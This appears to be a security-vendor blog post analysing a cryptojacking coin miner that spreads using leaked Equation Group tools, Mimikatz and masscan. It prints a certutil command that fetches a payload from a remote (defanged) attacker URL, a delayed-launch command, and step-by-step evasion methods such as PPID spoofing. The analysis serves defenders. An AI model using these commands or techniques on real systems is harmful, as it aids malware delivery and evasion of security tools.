- We analyse a cryptojacking attack that mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. The rebound of the cryptocurrencies market means that cryptojacking is an increasingly profitable activity for criminals.
- The use of freely-available exploits such as EternalBlue and DoublePulsar shows how exploits that were previously only available to nation state actors are gradually adopted by less sophisticated cybercrime players.
- The use of Mimikatz, masscan and WinPcap also raises the question about the aims of the attackers beyond simply distributing coin mining malware.
- Historically, coin mining malware has been regarded as a low severity threat, but attacks such as this demonstrate how this threat category has become more nefarious. Coin miners have started using techniques used by banking Trojans to evade detection, such as living-off-the-land binaries (LOLBins) for code execution, parent process ID (PPID) spoofing, and hiding files and payloads after execution to remain discreet.
The early adopters of cryptocurrencies like Bitcoin, Ethereum and Litecoin were privacy-conscious individuals and currency enthusiasts. Over time, however, the inherent pseudonymous properties of cryptocurrencies has attracted people with less noble intentions – those who wish to reduce the traceability of financial transactions associated with criminal activities.
One of the fundamental requirements for cryptocurrencies is to verify the accuracy of each transaction’s details to ensure transactions remain secure and trustworthy. There is no concept of a managing authority in cryptocurrencies, and the job of verification is performed by a community of global users, often referred to as “miners”. The transaction details of cryptocurrencies like Bitcoin are publicly available. A collection of transaction records forms a unit called a “block”. After a transaction is verified, each block is assigned a unique code called a“hash” and the complete transaction record is compiled to form a blockchain ledger. The process of verifying and adding the transaction details back into the blockchain requires solving complex and computationally-intense hashing problems. In exchange for solving these problems, miners are awarded a certain number of cryptocurrencies.
Solving the hashing problem takes substantial computing power, but can be sped up by using GPUs and specialist hardware called an ASIC (Application-Specific Integrated Circuit). ASICs are extremely costly and require considerable cooling effort, resulting in astronomical electricity bills for their owners. Without a doubt, cryptocurrency mining is a costly enterprise.
Attackers have also started using post-exploitation tools, enabling them to infect multiple computers by moving laterally within the compromised network. Cryptojacking activity tends to follow the value of cryptocurrencies. As the value of cryptocurrencies increases, cryptojacking becomes an increasingly profitable activity for criminals. It also has benefits over other means of generating revenue, such as ransomware:
- Ransomware is typically a one-time activity, and most enterprises don’t honour demands for the ransom.
- Ransomware attacks attract the attention of law enforcement agencies.
- If third-party ransomware is used, developers typically take a cut of any ransom money that is paid.
- The development of ransomware requires more skill than a coin miner.
- Detecting a coin miner is difficult compared to most malware because mining software can be used legitimately.
- Once a coin miner is deployed, an actor can monetise the infected host for as long as the host is online.
Recently we came across a URL delivering coin mining malware. The payload was isolated by Bromium Secure Platform and provided a lot of data for understanding how the attack works. In this blog post, we analyse its behaviour and how it uses a suite of post-exploitation tools, including EternalBlue, to extend the intrusion into the victim’s network. This wasn’t your typical coin mining malware.
The malware mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. This appreciation is one possible reason why cryptojacking attacks are increasingly attractive to attackers. Monero, in particular, is favoured by criminal actors because it is less resource intensive to mine since it does not require an ASIC, unlike other cryptocurrencies. Ultimately, this means that attackers can target low-powered devices and still turn a profit.
- Main dropper
- Filename: download.exe
- Size: 90 KB (92160 bytes)
- MD5: 0fe77bc5e76660ad45379204aa4d013c
- SHA1: 189D75F6485B7F220B143C0DD548D97BD7D81E3F
- SHA256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
This portable executable (PE) file is delivered through a URL. Looking at the sections of the file in PEStudio, suggests that it was packed using UPX, an open source packer.
When run, download.exe unpacks itself and copies the unpacked file to “C:\WebKitsSdk\2.7.92” with the name ophgsf.exe.
The newly written file is then run as a child process of download.exe.
The process then copies itself to C:\Windows\SysWOW64 with the name tgvbgq.exe and marks it as a hidden file.
To make the malware persistent on the system, ophgsf.exe creates and launches a new service called Abcdef where the BinaryPath points to C:\Windows\System32\tgvbgq.exe. Because the CreateService API is called from a 32-bit process, the service’s configuration is set to WOW64. When process ophgsf.exe calls StartService API to launch the binary registered as service, it launches the binary from C:\Windows\SysWOW64 directory instead of C:\Windows\System32\tgvbgq.exe that was provided in the binary path due to Wow64 redirection. The service is granted the following rights through the DesiredAccess parameter value (0xF0137):
Figure 6 – Service creation to establish persistence.
Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection and second, upon the start of the service, the binary is always executed even though it is not a valid service executable. After starting the service, ophgsf.exe copies itself from C:\WebKitsSdk\2.7.92 to C:\Windows\SysWOW64 as “126860.bak” and then terminates itself.
A PE file called SunloglicySrv.exe is downloaded and run by download.exe from the URL hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and saved to C:\WebKitsSdk\2.7.92\. Bromium Cloud Service classifies this threat as Win32.Trojan.Miner.
After starting the coin miner process (SunloglicySrv.exe), download.exe then launches the certutil tool using command prompt (cmd.exe). Certutil is a Windows built-in tool used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally:
certutil.exe -urlcache -split -f [URL] DestinationFile
In this case, the provided URL is hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and the destination file is %SystemRoot%\Temp\SunloglicySrv.exe.
We see certutil being frequently misused as a LOLBin by malicious actors. One of the reasons why malware authors prefer to download a payload using certutil because using a signed Microsoft tool is less likely to be detected than using third party programs. If the download using certutil was successful, cmd.exe runs the file. We found that the file (SunloglicySrv.exe) was the same coin miner that was downloaded and launched earlier by download.exe.
Afterwards, download.exe moves itself to the directory “%TEMP%\127172\….\” and saves the file with a name “TemporaryFile”. It then renames the directory “….” to “%TEMP%\127172\”. The reason for copying a file and then renaming a directory in this way is to break file tracking. The Windows file system doesn’t provide callbacks for files within the directory during a directory rename operation, and this technique allows malware authors bypass tracking of their binary by security solutions and makes the job of an auditor a whole lot harder. Finally, download.exe ends its process.
The coin miner process is launched from C:\WebKitsSdk\2.7.92 and copies itself to C:\Windows\ugrpkute with the name tpcunli.exe. Once a copy is created, it follows the same technique of breaking file tracking by moving the file from C:\WebKitsSdk\2.7.92 to C:\Users\bruser1729\AppData\Local\Temp\127437\….\ using the file name “TemporaryFile”, before renaming the directory to C:\Users\bruser1729\AppData\Local\Temp\127437\.
- Filename: tpcunli.exe
- File Path: C:\Windows\ugrpkute
- SHA256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81
- Bromium Cloud Service classification: Win32.Trojan.Mbt
The process then runs tpcunli.exe from cmd.exe using the start command. It joins the command with a ping command that delays the launch of the program by five seconds. This is common way to delay the execution of commands. After running the command, SunloglicySrv.exe ends its process.
cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe
The process begins by modifying itself with another payload. Afterwards, it creates a service called “plikeztuc” where BinaryPath points to C:\Windows\ugrpkute\tpcunli.exe and the DesiredAccess is 0xF0137. After creating the service, it ends its process.
- Filename: tpcunli.exe
- File Path: C:\Windows\ugrpkute
- SHA256: 69481183822cbc5972843308746f1b32426c68375acd82ebe84f04930a4800ef
- Bromium Cloud Service classification: Win32.Trojan.Mbt
The process runs the cacls tool which is used modify access control lists (ACLs). Specifically, it deletes the permissions to access the /etc/hosts file for members of the users and administrators group and the system user.
The process also hides the current user’s Internet history and cookie files by changing their file properties and placing desktop.ini files in each subdirectory.
Next, it runs netsh commands to block incoming Server Message Block (SMB) traffic. The command resembles those used by WannaCry, where it exploited an SMB version 1 vulnerability and applied similar IPSec policies to block TCP port 445.
Figure 16 – Netsh commands to apply IPSec policy to block incoming SMB traffic.
The process drops various publicly available tools and exploits, such as those exposed by The Shadow Brokers in 2017. These tools were developed by National Security Agency’s Equation Group and have been used by several malware authors, including the creators of WannaCry.
- DoublePulsar backdoor
- Exploit based on CVE-2017-8464
Next tpcunli.exe installs WinPcap version 4.1.3 using silent mode flat (“/S”). The properties of this file show that it was taken from a product called BMC TrueSight installer.
The WinPcap installer attempts to stop the services of BMC TrueSight and restarts the Netgroup Packet Filter (NPF) driver.
Tpcunli.exe runs masscan (bgichmvs.exe) through cmd.exe and uses it to scan for open ports of public IP ranges. Because masscan is dependent on the WinPcap driver (npf.sys), this likely explains why WinPcap was installed.
Next tpcunli.exe writes a list of hardcoded public IP address ranges to a file called ip.txt. Afterwards it launches masscan and provides the list of IP ranges as input to scan for open TCP port 7001 at a rate of 4096 packets per seconds and write output in JSON format. We believe it does so to find exposed Oracle Weblogic servers that are listening on port 7001 that may be vulnerable to CVE-2017-10271.
Next tpcunli.exe runs Mimikatz (vfshost.exe) to extract credentials lsass.exe (Local Security Authority Subsystem Service) process using its sekurlsa module. This module retrieves a password in plain text format, which can be used for further attacks using the pass–the–hash technique. If the command is running as Administrator then it requires debug privilege rights.
Tpcunli.exe copies itself to C:\Windows\IME using the file name masruql.exe. It then runs Windows Task Scheduler (schtasks.exe) to create two scheduled tasks. The first is called “qnsegabbm” which runs masruql.exe using the SYSTEM account and reoccurs every minute. The second is called “senutquec” which runs a command that modifies the user access rights of C:\Windows\ugrpkute\tpcunli.exe to allow everyone. This reoccurs every minute and uses the SYSTEM account.
Afterwards, tpcunli.exe drops another payload (enakii.exe) and its configuration file in C:\Windows\temp\zceliqcqn. The configuration file matches that used by XMRig, a free Monero coin miner, suggesting that malware is based on that software.
- Filename: enakii.exe
- Location: C:\Windows\temp\zceliqcqn
- SHA256: 245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7
- Bromium Cloud Service classification: Win32.Trojan.Coinminer
After dropping the payload, a third scheduled task is created called “kqivnbrqa”. It modifies the user access rights of C:\Windows\TEMP\zceliqcqn\enakii.exe to allow everyone. This task is set to reoccur every minute and is run using the SYSTEM account.
Figure 29 – Third scheduled task.
Tpcunli.exe performs a PPID spoofing technique to launch the child process enakii.exe. Using PPID spoofing, it indirectly executes C:\Windows\TEMP\zceliqcqn\enakii.exe by launching enakii.exe as a child process of C:\Windows\System32\Spoolsv.exe.
One of the ways malware can perform PPID spoofing is to open handle on a target parent process, call UpdateProcThreadAttribute to update the attribute list in the STARTUPINFOA structure of child processes, and then change PROC_THREAD_ATTRIBUTE_PARENT_PROCESS with the handle of process target parent process.
Tpcunli.exe also drops a tool (ouousbpro.exe) used to exploit CVE-2017-8464 by creating shortcut files (.LNK) for all non-existent drives. We believe it does this to spread to removable media and network drives.
If the process continues to run, it tries to exploit an existing vulnerability in the system to move laterally.
The graph below shows the chain of events captured in the micro VM, which includes the dropping of payloads, indirect execution of processes and high severity events triggered by known malware behavioural patterns.
Interesting Memory Strings – tpcunli.exe
In our analysis, we found that tpcunli.exe was very noisy and drops all of the post-exploitation tools on the system. Additional memory strings were identified that hint at what else this malware does:
- List of common passwords
- List of file extensions
- List of domain names
- Commands to dump the process memory of certain processes using Procdump which are then fed into Mimikatz to extract credentials:
- Commands to disable Windows firewall, SharedAccess, Windows Defender services.
- Fetch a configuration file cfg.ini from the following URLs:
- Use the following domain strings to download the coin miner payload:
- Try to move laterally within the network using known credentials.
Indicators of Compromise (IOCs)
*** This is a Security Bloggers Network syndicated blog from Bromium authored by Ratnesh Pandey. Read the original post at: https://www.bromium.com/cryptojacking-coin-miner-attack-uses-nsa-developed-equation-group-tools-to-move-laterally/